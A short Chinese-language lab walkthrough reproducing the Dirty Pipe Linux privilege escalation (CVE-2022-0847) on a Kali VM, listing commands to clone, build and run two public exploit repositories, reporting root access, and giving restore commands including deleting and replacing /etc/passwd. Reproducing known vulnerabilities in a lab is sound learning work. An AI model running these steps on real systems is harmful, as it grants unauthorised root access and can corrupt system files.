臟管漏洞原理
原文鏈接:https://dirtypipe.cm4all.com/
復現環境
kali虛擬機,普通用戶
項目
參考鏈接:https://github.com/imfiver/CVE-2022-0847
項目下載:https://github.com/imfiver/CVE-2022-0847
依賴:gcc,git
利用過程
先用git將github中的項目克隆下來
git clone https://github.com/imfiver/CVE-2022-0847.git
跳轉到腳本所在文件夾
cd CVE-2022-0847
賦予腳本權限
chmod +x Dirty-Pipe.sh
運行腳本
bash Dirty-Pipe.sh
攻擊結果
直接從普通用戶提權到root用戶。下面也有恢復密碼的方法。
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
並且切換用戶時,root賬戶不需要密碼就可以登錄
另一個類似的
項目地址:https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
利用過程
下載命令
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
cd CVE-2022-0847-DirtyPipe-Exploit-main
編譯文件./compile.sh
運行文件./exploit
攻擊結果
按作者所說,應該彈一個root權限的shell,但我的好像是什么系統函數調用失敗,只是把root賬號的密碼改成了aaron
。后面試了普通用戶的密碼,root用戶的密碼,確實都失敗了,用aaron
才成功。切換用戶試了試,也是aaron
才成功。